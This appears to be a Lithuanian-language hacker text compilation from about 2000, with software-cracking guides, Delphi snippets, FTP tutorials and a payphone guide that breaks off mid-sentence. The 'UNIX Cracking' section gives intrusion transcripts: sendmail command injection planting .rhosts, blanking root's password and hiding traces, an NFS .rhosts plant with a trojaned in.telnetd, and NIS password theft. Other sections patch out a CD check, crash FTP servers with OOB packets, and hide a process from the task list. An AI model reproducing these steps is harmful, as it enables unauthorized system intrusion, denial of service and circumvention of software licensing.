Na ka baigesi? NE, na gerai dar palaukim, na kaip dabar? na OK procesas baigtas. Dabar jusu ekrane turejo atsirasti keistas tekstas, kurio mes visiskai nesuprantam:). Nesijaudinkite, vienintelis dalykas kuri dabar jus turite padaryti, tai susirasti antra mygtuka esanti is desines (String Data Reference), kuris yra salia printerio mygtuko. Dabar jus matote langa kuriame surasytos ivairios zinutes ir panasiai. Taigi susiraskite ta zinute kuri prase CD ir paspauskite du kartus ant jos. Uzdarykite STRING DATA REFERENCE langa. Dabar jus esate nebe kodo pradzioje, o kazkur viduryje ar kazkas tokio, kiekvienu atveju vis kitaip. Taigi dabar jusu ekrane turi matytis ta zinute kuri praso kompakto. Dabar pati svarbiausia vieta. Kilkite i virsu, nuo tos zinutes, kol pamatysite kazka panasaus:

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00410545 (c)
|

Jusu atveju skaicius bus aisku kitoks, bet bendras vaizdas turi buti panasus. Susirade tai, paspauskite Goto(Win32Dasm virsuje), atsiradusiame meniu pasirinkite Goto Code Location ir parasykite si skaiciu, mano atveju tai 00410545 ir spauskite OK. Taigi jus vel kazkur nusokote, dabar nejudedami is vietos, nusirasykite skaiciu esanti Win32Dasm apacioje, kuri atrodo taip (isskyrus skaiciai):

Line:34040 Pg 401 of 409 Code Data @:0041052F @offset 0000F945h in File:

Vienintelis dalykas kurio mums reikia tai skaicius einantis po @offset, ne po @ bet po @offset na tik -h-nebereikia. Taigi mano atveju man bus reikalingas 0000F945 skaicius, jusu atveju, kitas(jau kartoti atsibodo) taigi dabar nusirase si skaiciu, paliekame Win32Dasm ir einame dabar prie HIEW. Hiew’e pasirenkame mus reikalinga EXE faila. Dabar spaudziame F4 ir pasirenkame Decode, paskui seka F5 paspaudimas. Taigi dabar parasome musu skaiciu, mano atveju, kaip zinome yra 0000F945 Dabar spaudziame enter, ir BOOM mes toje vietoje kur ir norime buti. Bet dabar as jums noriu pasakyti pagridndinius asemblerio kalbos JUMPUS:
ASM. —Ka reiskia
—————————————————————-
jne —Ivyksta suolis jei nelygu
je —Ivyksta suolis jei lygu
jmp —Bet kokiu atveju ivyksta suolis
nop —Nieko neatlieka(no operation)
ja —Ivyksta suolis jei virsuje
jna —Ivyksta suolis jei nevirsuje
jae —Ivyksta suolis jei virsuje arba lygu
jnae —Ivyksta suolis jei nevirsuje arba lygu
jb —Ivyksta suolis jei zemiau
jnb —Ivyksta suolis jei nezemiau
jbe —Ivyksta suolis jei zemiau arba lygu
jnbe —Ivyksta suolis jei nezemiau arba lygu
jg —Ivyksta suolis jei didesnis
jng —Ivyksta suolis jei nedidesnis
jge —Ivyksta suolis jei didesnis arba lygu
jnge —Ivyksta suolis jei nedidesnis arba lygu
jl —Ivyksta suolis jei mazesnis
jnl —Ivyksta suolis jei nemazesnis
jle —Ivyksta suolis jei mazesnis arba lygu
jnle —Ivyksta suolis jei nemazesnis arba lygu
—————————————————————-

Zinoma as suprantu, tai gali atrodyti is pradziu keblu, as pamenu, kai pats pirma karta tai pamaciau, O dieve galvojau, ir ka as cia bandau ismokti :)), bet kaip sakant kas bando tam ir pavyksta. Bet dabar jums tereikia pakeisti: Jei dydesnis, tai keiciate i Jei nedidesnis, tai yra jei yra JNE keiciate i JE ir atvirksciai, o linksmiausia dalis tame, kad netgi daugelis programu yra apsaugotos tokiu budu:). Taigi as dabar stoviu:

0000F945: 751D jne 0000F964

Taigi kaip jau supratote man reikia pakeisti, JNE i JE . Dabar jus pasakysite:”Na tai kas, kad as zinau ka i ka reikia keisti, bet KAIP man tai padaryti???” Taigi sakau reikia paprasciausiai pakeisti viena skaiciu, vienu daugiau arba vienu maziau. Taigi pas manes yra skaicius 751D ir JNE. Norint is JNE padaryti JE as turiu pakeisti 751D i 741D. O jei butu pas manes JE tai tureciau atvirksciai ne atimti, bet prideti prie 5 . Kartais buna, kad reikia isviso panaikinti operacija taigi, parasydami NOP vietoj JNE ar kas bebutu, tai darome parasydami 90 beje, jei jau mes turime atjungti operacija(NOP), tai isidemekite, kiek skaiciu turi ta eilute, Win32Dasme ant kurios mes stovejome, kai atlikome funkcija Go to code location isidemekite antra skaiciu is kaires, toje eiluteje kur stovite. Jei skaicius pavyzdziui yra 751D tai ji keiciame 9090, jei 751D000000 tai ji turime pakeisti i 9090909090 vienu zodziu turime pakeisti skaiciu i skaiciu. Beje kai Hiew’e jus rasysite 90 nekreipkite demesio, kad eilute nusoka, paprasciausiai surasykite tiek 90 kiek reikia ir viskas.
Norint kad mums leistu keisti kanors, paspauskime F3 ir galime irasineti, o kai baigsite rasyti , tai paspauskite F9 – uzfiksavimui ir F10 – isejimui, ir viskas. Kartais buna, kad neiseina ne vienas auksciau isvardytas variantas. Tada paprasciausiai susirasykite visu JUMP’u @offset numerius einancius nuo zinutes i virsu ir juos keitaliokite, juk niekada negali buti uztikrintas kuris JUMP’as reikalingas.

PS: shis tutorialas yra sudetas ish keliu ir viskas surishta mano pachio mintimis;)

10. UNIX Cracking

Pvz No1.

crack% telnet target.remote.com 25
Connecting to 123.456.654.321.
! prisijungiam prie 25 porto – tai SMTP
220 sendmail SMI/4.3.5.2 ready
! versija kaip zhinome turi buga.
helo xxx
220 Helo xxx, ( crack.edu )
mail from: |echo crack.edu/.rhosts@target.remote.com
! statome komanda vietoj atgalinio adreso.
200 Sender ok.
rcpt to: nosuchuser
! ivedam ishanxto neteisinga adresata
500 nosuchuser: user unknown
! nekreipdami demesio i praneshima tesiame dialoga .
dataŽ
230 Enter mail, end with .
200 Mail accepted
! viskas mashina nulauzhta..
quitŽ
crack% su
! dabar ilendam taip kad musu nebutu matyti per who
# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#

Pvz No2.

crack# su – bin
$ rsh target.remote.com /bin/csh -i
! Faile /etc/hosts.equiv yra uzhrashas + ir klaida.
Welcome to remote.com!
! Katalogas /etc su savininku bin.
Warning! No access to terminal, job control disabled!
% ls -ldg /etc
drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/
% cd /etc
! Darom kad mums galima butu editinfi passwd .
% mv passwd passwd.was
% cp passwd.was passwd
! redaguojam
% ed passwd
2341Ž
1p
root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh
s/Nkkh5gkljGyj//p
root::0:0:Root:/:/bin/csh
w
2341
q
! Ir super useryje.
%echo /bin/csh -i | su root
Warning! No access to terminal, job control disabled!
target# mv /etc/passwd.was /etc/passwd
! Kad niekas nepastebetu ka mes dareme.

Pvz No3.

crack% showmount -e target.remote.com
Export list for target.remote.com
/home Everyone
/disk3 neptun pluton alpha
! Domeininej katalogaj prieinami per NFS
crack% su
# mount -t nfs target.remote.com:/home /mnt
# cd /mnt
! Mountinam kataloga sau
# ls -ldg *
drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/
# echo crack.eduŽ user/.rhosts
! Idiegiam .rhosts pas pas userius
# catŽ /etc/passwdŽ
user::257:20::/:
^DŽ
! sukuriam toki pati pas mumi
# su – userŽ
! Tampam juo
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
!Ir einam i svechius -)
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc
! Katalogas prieinamas writinimuj
drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd
!Radom programike kuri pasileis
!per roota ish musu katalogo
% cd /usr/etc
% mv in.telnetd in.telnetd1
! sukuriam trojana
% catŽ in.telnetd
#!/bin/sh
exec /bin/csh -i
^D
% chmod 755 in.telnetd
! ir paleidzhiam ji
% telnet 127.1
Connecting 127.1.
Warning! No access to terminal, job control disabled!
# chown user /etc;
! Darom /etc savu
^M: command not found
# exit;
^M: command not found
Connection closed by foreign host.
% cd /etc
! o toliau kaip in Pvz No1.
....

Pvz No4.

! chekinam ar yra NIS Ž
crack% rpcinfo -p target.remote.com | grep bind
120000 2 udp 2493 ypbind
! yra toxaj ..
crack% ypx -o target.passwd -g target.remote.com
! pasimam paswordu faila
crack% crack target.passwd
! leidzhiam passwd ieshkokli
[ a lot of time ]
OK, user user has password iamuser
! radom, uzheinam
crack% telnet target.remote.com
! toliau viska kaip kad prieshtai buvusiam pvz .
..

– Hex –

(imti pvz, versta, kurta , bla bla bla rezultatas priesh akis)
Shitie budai yra pakankamai seni ir vieni ish primytiviausiu bet . heh
susipazhinkit su principu nes yra tokiu kurie net neisivaizduoja kaip yra
daromi tokie darbai ir uzhduoda tokius klausimus . mazhdaug su kokia
programele tu crackini ? ;

Informacion rulez and if u rule information ...

11. Delphi

Sios komandos skirtos programavimo kalbai – Delphi. Jos isbandytos su
5.0 versija.

..by ZErOnE

zerone@xxx.lt
______________________________________________________________________

1. Shut Down, Reboot, Standby funkcijos:

ExitWindowsEx(EWX_SHUTDOWN,0); { ShutDown }

ExitWindowsEx(EWX_REBOOT,0); { Reboot }

ExitWindowsEx(EWX_POWEROFF,0); { Standby }
______________________________________________________________________

2. Gauti pc IP adresa:

uses winsock;

.

function GetIPAddress: string;

var

phoste:PHostEnt;

Buffer:array[0..100] of char;

WSAData:TWSADATA;

begin

result:=”;

if WSASTartup($0101, WSAData) <> 0 then exit;

GetHostName(Buffer,Sizeof(Buffer));

phoste:=GetHostByName(buffer);

if phoste = nil then

begin

result:=’127.0.0.1′;

end

else

result:=StrPas(inet_ntoa(PInAddr(phoste^.h_addr_list^)^));

WSACleanup;

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

Label1.Caption:=GETIPAddress;

end;
______________________________________________________________________

3. Gauti win’u ir system foldery:

function GetWinDir: String;

var

dir: array [0..max_path] of char;

begin

GetWindowsDirectory(dir, max_path);

result:=StrPas(dir);

end;

function GetSysDir: String;

var

dir: array [0..max_path] of char;

begin

GetSystemDirectory(dir, max_path);

result:=StrPas(dir);

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

label1.caption:=GetWinDir;

label2.caption:=GetSysDir;

end;
______________________________________________________________________

4. Sisteminiu klavisu isjungimas/yhungimas (Alt+Tab, Alt+Ctrl+Del) :

var OldVal: LongInt;

begin

SystemParametersInfo (97, Word (True), @OldVal, 0); //disable

SystemParametersInfo (97, Word (False), @OldVal, 0); //enable

end;
______________________________________________________________________

5. Pakeisti background’a :

SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PChar(‘C:pvz.BMP’), SPIF_SendWININICHANGE);
______________________________________________________________________

6. Pakeisti peles pozicija :

SetCursorPos(600,600);
______________________________________________________________________

7. Gauti ScreenShot’a :

function GetScreenShot:TBitmap;

var

Desktop:HDC;

begin

Result:= TBitmap.Create;

Desktop:= GetDC(0);

try

try

Result.PixelFormat:=pf32bit;

Result.Width:=Screen.Width;

Result.Height:=Screen.Height;

BitBlt(Result.Canvas.Handle,0,0,Result.Width,Result.Height,Desktop,0,0,SRCCOPY);

Result.Modified:=True;

finally

ReleaseDC(0,Desktop);

end;

except

Result.Free;

Result:=nil;

end;

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

Image1.Picture.Bitmap:=GetScreenShot;

end;
______________________________________________________________________

8. Darbas su .ini failais :

uses inifiles;

.

var ini: TIniFile;

.

var reiksme1:string; {nuskaitymas}

begin

reiksme1:=ini.ReadString(‘Section’,’Edit1′,”);

label1.caption:=reiksme1;

end;

ini.WriteString(‘Section’,’Edit1′,edit1.text); {yrasimas}

procedure TForm1.FormCreate(Sender: TObject);

begin

ini:= TIniFile.Create(‘c:test.ini’); {.ini failo sukurimas}

end;
______________________________________________________________________

9. Enable/Disable Start mygtuko :

EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), TRUE); {enable}

EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), FALSE); {disable}
______________________________________________________________________

10. paslepti/grazinti desktop’a :

ShowWindow(FindWindow(nil,’Program Manager’),SW_HIDE); {paslepti}

ShowWindow(FindWindow(nil,’Program Manager’),SW_SHOW); {grazinti}
______________________________________________________________________

11. Programos paslepimas :

const

RSP_SIMPLE_SERVICE = 1;

RSP_UNREGISTER_SERVICE = 0;

var

function RegisterServiceProcess(dwProcessID, dwType: DWord):

DWord;stdcall;external ‘Kernel32.dll’ name ‘RegisterServiceProcess’;

{Ushsidek taimeri su intervalu 1}

procedure TForm1.Timer1Timer(Sender: TObject);

begin

Timer1.Enabled := False;

Form1.Visible := False;

RegisterServiceProcess(GetCurrentProcessID,RSP_SIMPLE_SERVICE);

Brush.Style := bsClear;

end;

{o kai uzdarysi forma daryk taip:}

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);

begin

RegisterServiceProcess(GetCurrentProcessID,RSP_UNREGISTER_SERVICE);

end;
_______________________________________________________________________

12. Kopijuoti/Perkelti/Trinti folderius :

uses shellapi

.

function copydir(von,zieldir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin

wFunc := FO_COPY;

fFlags := FOF_FILESONLY;

pFrom := PChar(von+#0);

pTo := PChar(zieldir)

end;

Result:=(0=ShFileOperation(fos));

end;

function movedir(von,zieldir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin

wFunc := FO_MOVE;

fFlags := FOF_FILESONLY;

pFrom := PChar(von+#0);

pTo := PChar(zieldir)

end;

Result:=(0=ShFileOperation(fos));

end;

function deldir(dir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin

wFunc := FO_DELETE;

fFlags := FOF_SILENT or FOF_NOCONFIRMATION;

pFrom := PChar(dir+#0);

end;

Result:=(0=ShFileOperation(fos));

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

if copydir(‘c:mp3′,’c:xxx’)=true then

begin

ShowMessage(‘Dir copied.’);

end;

end;
______________________________________________________________________

12. Freecell for Windows 98 SE krekinimas

Info:
Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)
Irankiai: SoftICE, Betkoks šešioliktainis redaktorius (http://ucol.home.lt/cgi-bin/ucol.pl?l_tools)
Taikinys: Žaidimas „Freecell“

Intro:
Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti :]
Kam gi reikia krekinti „Freecell“? Jeigu žaidžiame šį žaidimą ir mums niekaip nesiseka jį sužaisti, taigi mes norime iš jo išeiti ir vėl pradėti iš naujo, bet išeinant pamatome dialogą: „Are you sure you want to quit this game?“. Jeigu spaudžiame „Yes“, tai mums užskaitomas pralaimėjimas, o mes to visai nenorime :] Todėl reikia padaryti, kad tas dialogas visai neiššoktų ir nebūtų užskaitytas pralaimėjimas.

Pora sakinių:
Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, šešioliktainius redaktorius ir assembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:
SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.
Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):
.
INIT=”CODE ON; X;”
.
EXP=c:windowssystemkernel32.dll
EXP=c:windowssystemuser32.dll
EXP=c:windowssystemgdi32.dll
.
Kombinacijos:
Ctrl+D – įeiti į SoftICE;
F5 – įšeiti iš SoftICE;
F10 – vykdyti programą po vieną eilutę;
F8 – jeigu esame ant procedūros, įeiti į ją.

Krekinimas:
Jūs laisvai galite nukrekinti ir „Freecell“ iš windows 95, ten viskas labai panašu, nes kiek žiūrėjau failų dydžiai skiriasi tik keliais baitais.
Įeiname į žaidimą (StartProgramsAccessoriesGamesFreecell). Paleidžiame jį (GameNew Game). Bandome išeiti iš jo. Pamatome dialogą: „Are you sure you want to quit this game?“. Spaudžiame „No“ (juk nenorime pralaimėti :)). Einame į SoftICE (Ctrl+D). Rašome: bpx messagebox. Išeiname iš SoftICE (F5). Vėl bandome išeiti. Aktyvuojasi SoftICE. Spaudžiame F11 (išėjimas iš proceduros). Pasirodo dialogas. Spaudžiame „No“. Vėl aktyvuojasi SoftICE. Štai ką matome:

.
:03D8 68D604 push ds ;dialogo parametras
:03DB 1E push 56c ;dialogo parametras
:03DC 686C05 push ds ;dialogo parametras
:03DF 6A24 push 24 ;dialogo parametras
:03E1 9A00009717 call user!messagebox ;iškviečiame dialogą
:03E6 3D0700 cmp ax,0007 ;ar buvo paspausta „No“
:03E9 0F846E04 jz 085b ;jeigu paspaudėme „No“ nedarom nieko
:03ED E8FE1A call 1eee ;užskaitome pralaimėjimą
:03F0 E80734 call 38ca ;užskaitome pralaimėjimą
:03F3 E9BFFE jmp 02b5 ;nošokame į išėjimą
.

Užsirašome pilkai pažymėtys baitus (68D6041E686C056A24). Jų mums prireiks vėliau. Taigi mums reikia praleisti dialogą ir pralaimėjimo užrašymą ir iš karto nušokti į išėjimą. Tuo mums puikiai pasitarnauja pirmasis dialogo parametras, kuris užima tiek baitų kiek ir išėjimo komanda (jmp 02b5). Todėl tą dialogo parametrą (push ds) reikia pakeisti komada jmp 02b5. Rašome: bpx 3d8. Tai reiškia, kad SoftICE sustos toje vietoje, kai bus bandoma užkrauti pirmą dialogo parametrą. Išeiname iš SoftICE (F5). Bandome išeiti iš žaidimo. Aktyvuojasi SoftICE ties pirmu dialogo parametru. Rašome: a (tai reiškia, kad mes pakeisime komandą push ds kita). Dabar rašome jmp 02 b5 (keičiame komandą). Spaudžiame Enter, paskui Escape. Štai ką matome:

.
:03D8 E9DAFE jmp 02b5 ;nošokame į išėjimą
:03DB 1E push 56c
:03DC 686C05 push ds
:03DF 6A24 push 24
:03E1 9A00009717 call user!messagebox
:03E6 3D0700 cmp ax,0007
:03E9 0F846E04 jz 085b
:03ED E8FE1A call 1eee
:03F0 E80734 call 38ca
:03F3 E9BFFE jmp 02b5
.

Pasikeitė trys baitai, užsirašome raudonai pažymėtus (pasikeitusius) baitus (E9DAFE). Išeiname iš SoftICE (F5). Kartu su SoftICE užsidarė žaidimas ir nebuvo jokio dialogo. Einame į šešioliktainį redaktorių, atidarome faila freecell.exe, vykdome paiešką pagal pilkai pažymėtus užsirašytus baitus. Suradę juos, tris pirmus pakeičiame į raudonai pažymėtus užsirašytus baitus (E9DAFE), išsaugome failą. Išeiname iš šešioliktainio redaktoriaus.

Pabaiga:
Viskas žaidimas „nukenksmintas“. Pabandykite paleisti jį, šiek tiek jame pažaisti ir išeiti. Ką matote? Jokio dialogo išeinant! Vėl įeiname į žaidima, pažiūrime į rezultatus. Rezultatai tokie patys, pralaimėjimas neužskaitytas! Bet žaidimas iki galo dar nenukrekintas, nes dialogas atsiranda vykdant žaidimo meniu komandą „GameNew Game“ antrą kartą. Šitą dialogą pabandykite nukrekinti patys.

13. Domenas dykai

Nemokamos domainu dalintojos namezero hakas
Turbus daugelis zinot kompanija namezero
http://www.namezero.com
kuri nemokamai jums duoda domaina (com, net, org). Bet yra trukumas- ji jusu puslapio apacioje padaro frame`a, kuris gadina visa vaizda.
Pabandykime pagalvoti kaip jis padaro sita visa mesla. As manau jis daro taip: sukuria html dokumenta, kuris suskirstytas i du frame`us, kuriu vienas ira jusu svetaines tikrasis adresas, kitas namezero reklama.
Pasirodo to galima isvengti. Kaip taipadaryti?
I pagalba ateina JavaScript: jus savo puslapio titulineme dokumente iterpete JavaScript`uka, kuris jusu frame`a sulauzo, t.y. padaro per visa page`a. stai kaip atrodo sitas scriptas:

<script language=”JavaScript”>
<!– Slepeme nuo narsykliu, kurios nesupranta JavaScript
// Copyright © 2000 uid=o
// Created by SaTaN
//www.zemrsn.lt/uid0
if (self.parent.frames.length != 0)
self.parent.location=”index.html”;
//vietoj index.html galite/privalote rasyti jusu norima dokumenta, kuri suaktyvinus dingsta visi frame`ai
// –>
</script>

Kuo sitas budas yra blogas?
Nevisos narsykles supranta Javasript ir nevisi narsykleje JavaScript yra ijunge.
Beto jei jus norite issivaduoti tik is to namezero frame`o, o kitus, savo puslapio frame`us paliktitai jums neisdeks.
Iseitis: nenaudokite savo puslapyje frame`u arba padarykite izangini puslapi i jusu frame`ini puslapi, kureme ir bus visas frame`u zydymas.
Demonstracija viso sito galite pamatyti cia:
http://www.userid0.org
Tai yra uid=0 domainas, su nukilintu frame`u.
-=Visa sitai nera versta, kopijuota ar kitai pasisavinta is kitu dokumentu, saitu. Visa tai tik uid=0 sugalvota=-

14. FTP totorial`as

FTP (file transfer protocol)- failu perdavimo protokolas. Naudojantis siuo protokolu galima ivairia informacija failu pavidalu perduoti is vieno kompiuterio i kita, nepriklausomai nuo atstumo tarp kompiuteriu ar ju operaciniu sitemu. Tai vienas is budu perkelti jums reikalinga informacija is kito kompiuterio i savaji ir atvirksciai.

-= FTP reikalingas: =-

Padeti sureguliuoti failu (programu arba/ir duomenu) paskirstyma
Suteikti galimybe tiesiogiai ar netiesiogiai naudotis sistemos resursais
Apriboti vartotojo is kitos sistemos navigacija nutolusioje sistemooje
Efektyviai ir patikimai perduoti duomenis isvienos sistemos i kita

Failu perdavima is vienos sistemos i kita relizuoja dvi programos, naudojancios FTP protokola: programa-serveris, kuri veikia tolimoje sistemoje, ir programa-klientas, kuri aptarnauja norincius pasiimti/duoti failus tolimai sistemai.

Programa-serveris laukia uzklausos ir po to specialiu protokolu realizuoja failu siuntima is/i tolimos sistemos i/is prisijungusiji kompiteri ir taip pat aptarnuoja programa-klienta, t.y. priima ir siuncia specialias ftp komandas.

Programa-klientas prisijungia prie tolimos sistemos, siuncia failus is/i tolima sistema, kuria patogia (arba ne) vartotojo aplinka ir dialogus su vartotoju, transformuoja vartotojo komandas i standartinu ftp komandu seka ir perduoda ja kaip uzklausa ar atsakyma i uzskausa programai-serveriui.

Prisijunge prie tolimos sistemos, jus igaunate dauguma teisiu, kurias turetumete, jei naudotumetes TELNET (aisku prgramu vykdyti ar tikrinti pasto etc neiseis). Bet jus galesite trinti, perkelti, kopijuti etc failus (aisku jei jus turesite tam tikrus leidimus). Jusu teises priklauso nuo sistemos konfiguracijos ir aisku jusu vartotojo vardo (USERNAME).

Prisijungus prie kokio tai FTP serverio jus turite prisistatyti, t.y. nurodyti savo vartotojo varda (username) ir slaptazodi (password). Dauguma serveriu leidzia prisijungti su Anonymouse ar ftp vartotojo vardu (kur password buna jusu email). Tada jusu teises priklauso nuo serverio admino, bet dazniausiai jus tegalite failus tik parsiusti (kartais leidziama ideti failus i incoming kataloga).

Jei naudojates ne visualiu ftp klientu, tai jums reikes zinoti keleta komandu:

pwd – Parodo kokiame kataloge yra siuo metu vartotojas (t.y. jus)
cd – Keicia kataloga, kuriame jus esate
mkdir – Sukuria kataloga
rmdir – Istrina kataloga.
rename – Pervardina faila.
delete – Be komentaru
get – Parsiunce faila is tolimos sistemos i jusiske
put – Siunce faila is jusu sistemos i tolima
FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.

FTP exploitus gali rasti siuose saituose:

http://cert.org

http://www.iss.net/cgi-bin/xforce/xforce_index.pl

http://packetstorm.genocide2600.com

http://www.rootshell.com

http://www.slashdot.org

15. FTP Tutorial 2

DIDELIS FTP TUTORIALAS NAUJOKAMS IR NE TIK
=====================================================================
Sveiki, shiame tekste aprasysiu, kas yra FTP, kam jis naudojamas, keleta terminu ir siaip idomiu dalyku. Pirmiausia, tai jei tau yra labai nepatogu skaityt si teksta (ar kitus) kur reikia vazinet tai i kaire, tai i desine, tai tai yra todel, kad pas tave nepadarytas word wrap. Ji gali padaryt edit/word wrap.

DISKLEIMERIS:
=====================================================================
Man yra visiskai nesvarbu, ka tu darysi paskaites si teksta, bet jei padarysi ka nors negero kaltink tik pats save, nes as ji rasiau tik tam, kad galetum apsisviest. >)
=====================================================================
TURINYS:
=====================================================================
1.0–Kas yra FTP ir kuo jis yra geras
2.0–FTP komandos
3.0–FTP hacking’as
4.0–Keletas FTP bugu
5.0–Keletas terminu naujokams
=====================================================================
1.0 :
FTP (file transfer protokal) lietuviskai butu failu siuntimo protokolas. FTP serveriai leis tau ieiti su User Anonymous, o vietoj passwordo reikes irasyt savo e-maila. Aisku, jei tu turi useri ir zinai user passworda, tai geriau jungtis taip. Jei pasijungsi su Anonymous, tai tu turesi tik read-access. Taip pat galesi matyt tik labai ribota kieki failu. Jei turi ten useri, tai turetum turet tada ir write-access. Tuomet galetum matyt visus isskyrus root-accsess fileus. FTP yra labai geras dalykas, nes kai prisijungi prie FTP serverio, po ji gali vaiksciot kaip po savo kompa. Windowsams labai gera programa yra WS_FTP, nes ji labai patogi valdyti, ir langas, kuriame matai FTP serverio kompa bus panasus i Norton Commander langa. WS_FTP gali atsisiut is www.tucows.com arba kiek zinau ji yra ir mail.tiltas.lt FTP serveryje. FTP naudoja 21 porta.
=====================================================================
2.0 :
Jei prie FTP servo jungies per DOS ar UNIX komanda FTP, tai tada turesi rinkt keleta tokiu komandu, jei noresi paziuret, nusiust ar atsisiut failus:

cd kaip ir UNIXe ar DOSe ji keicia direktorijas (folderius) kompe, kuriame esi
lcd ji keicia tavo kompe direktorijas
dir/ls parodo direktorijas ir failus, kurie yra direktorijoj kurioj esi
get atsisiuti faila
mget atsisiusti daug failu
put nusiusti faila
mput nusiusti daug failu
pwd paraso, kurioje direktorijoj tu esi
=====================================================================
3.0 :
FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.
FTP exploitus gali rasti siuose saituose:
cert.org
www.iss.net/cgi-bin/xforce/xforce_index.pl
packetstorm.genocide2600.com
www.rootshell.com
www.slashdot.org

Sie saitai nera illegalus. Jie yra legalus ir jie paprasciau paaskina, kokios skyles gali buti jusu kompe ir panasiai.
Taip pat gali subscribeintis bugtraqe. Cia yra labai gera konferencija, tiems, kas domisi OS, ir programu exploitais, bugais. www.securityfocus.com
Siuose saituose tau reiktu ieskoti zodziu, tai yra OSu, programu. Pvz.: pasijungiu prie servo, ir matau, kad jis naudoja Mandrake Linux. Tada eini i kuri nors is isvardintu saitu, ir i searcha (ar kur kitur) Mandrake Linux 2.2.13. Tada ten gaunat keleta exploitu ir galbut iseis jums gauti root access!!! Bet aisku turbut apie tai tik svajot. Nu nesvarbu. Jei nori suzinot FTP servo naudojama OS, bandyk jungtis su telnet’u per porta 21, 22, 23, 25. Ir panasiai. Taip pat per 25 porta jei iseis pasijungt, tai suzinosi ir naudojama Send-mail programa. O kaip zinoma, send-mail programos turi ivairiu exploitu.
=====================================================================
4.0 :
Keletas siu bugu yra paprastos padarytos klaidos, ir jie nera kokie nors fantastiski. Jie cia yra surasyti tik tam, kad tu jei esi naujokas, galetum susipazinti su keletu exploitu.
Sie bugai yra paimti ne is kokiu nors dideliu hacking saitu, o is paprastu homepageu, kurie pamoko, kaip savoj sistemoj istaisyt klaidas.

1-bugas. FTP Bounce Attack (jis yra per ilgas, nueik i http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425)
2-bugas. Bet kas is isores galetu isjunkt FTP serveri. Ir jei dar FTP servas naudoja win 3.1 systema tikrai nusicrash’ins.
Programa: WinQVT/NET (tinka visos versios)
Exploitint: paprasciausiai issiusk OOB (Out of Band) i porta 21.
Kaip ji exploitint naujokams, ar tiems kurie tingi kaip nors vienaip ar kitaip terliotis: Su bet kokiu winnuke reikia issiust ta packeta (ar ka ten siuncia nukeas) ne i 139 porta, bet i 21 porta. Sis budas turetu tikrai suveikt ant win 3.1 ir kazka girdejau, kad WIN NT 4.0 turi ta pati bug’a.
Taip pat, kai pasijungi prie FTP servo su telnet, DOS, ar UNIX, pabandyk surinkt SYST komanda. Tau tada turetu ismest idomios informacijos apie ta kompa, tai yra: OS, bei info apie FTP serva.
=====================================================================
5.0 :
1. Daemon – programa, kuri klauso, ar niekas nesijungia per koki nors porta, ir jei jungiasi, bendrauja su tuo, kas jungiasi.
2. Root – Useris, kuris UNIXe gali daryti VISISKAI KA NORI. Tai yra, jis gali keist kitu user’iu passwordus, kreatint naujus userius, trint ka tik nori, ir pan. pan.
3. Flames – kai ant kieno nors varai, tai yra vadini ji visokiu daunu, lochu, debilu, gejum ir pan. Flameinama paprastai per e-maila.
4. ISP – Internet service provider. Jei nesupranti angliskai, tai Interneto rysio tiekejas.
5. Read-access, write-access ir pan. – tai tam tikri tavo veiksmu apribojimai. Jei turi read-access, tai gali tik skaityti ir atsisiusti, ir tai ne visus failus. Jei turi write-access, tai gali irasyti i sistema ka nori, bet negali daryti ka nori. Root-access gali daryti KA TIK NORI.
=====================================================================
Laukite sio texto papildymo.

Si texta rase spadofora. Ate
Iki pasimatymo NETE!
2000.05.21 17:05

16. Taksofonai zhaliems

Visishko idioto ivadas i praktine telefonija
“TAKSOFONAI ZHALIEMS”

Parenge: ww0lf
1999, Kaunas

Ishpostinus cyberia/MG failiuka apie taksofonu “Pulsar-50” meniu, susilaukeme
didelio demesio ir labai daug klausimu, kas ten yra kaip 🙂
Pavarges atsakineti i klausimus, nutariau parashyti kiek ishsamesni teksta
shia tema. Taigis.

Shiuo metu Lietuvoje labiausiai paplite yra “Pulsar-50” taksofonai, liaudyje
vadinami “czipiniais”. Daugelis vartotoju linke naudotis jais kaip nurodo
“Lietuvos telekomo” instrukcija. Ir mazhai kas zhino, kad shis taksofonas –
tai mazhytis kompiuteris, kuri galima konfiguruoti, aktyvuoti vienas ar
